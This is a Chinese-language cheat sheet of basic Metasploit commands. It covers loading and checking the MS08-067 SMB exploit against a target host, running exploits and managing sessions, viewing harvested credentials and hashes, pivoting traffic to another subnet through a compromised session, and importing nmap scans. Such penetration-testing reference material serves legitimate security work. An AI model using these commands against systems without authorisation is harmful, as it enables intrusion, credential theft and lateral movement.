基本命令

root@kali:~# msfupdate  升级msf

root@kali:~# msfdb reinit  重新初始化数据库

root@kali:~# update-rc.d postgresql enable  使postgresql数据库开机自启

msf > search name:smb cve:2015

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > info  查看漏洞的详细信息

msf exploit(ms08_067_netapi) > show missing  查看未指定的必须项

msf exploit(ms08_067_netapi) > check  验证目标系统是否存在漏洞

msf > hosts -c address,name,os_name -S xp

msf > hosts -d

msf > services -p 80

creds  查看扫描出来的密码信息

vulns  查看扫面出来的漏洞信息

loot  查看hash值

msf exploit(ms08_067_netapi) > set rhost 192.168.80.150

msf exploit(ms08_067_netapi) > unset RHOST

msf > setg rhost 192.168.80.150

msf > unsetg rhost


msf exploit(ms08_067_netapi) > save

root@kali:~# rm /root/.msf4/config

msf exploit(ms08_067_netapi) > exploit -j  后台运行

msf > sessions

msf > sessions -i 3

msf > load nessus  加载nessus插件

msf > unload nessus

msf > route add 210.45.128.0 255.255.255.0 3   朝向210.45.128.0/24的流量通过session3进行流量转发

root@kali:~# vim 08-067.rc  编辑ms08-067的攻击过程

msf > resource 08-067.rc  通过resource命令直接调用,或者:

root@kali:~# msfconsole -r 08-067.rc


将nmap的扫描结果导入msf

root@kali:~# nmap -Pn -sV -oX dmz 192.168.80.0/24  使用-oX参数将扫描结果导出为dmz文件

msf > db_import /root/dmz  导入扫描结果

你可能感兴趣的:(基本命令)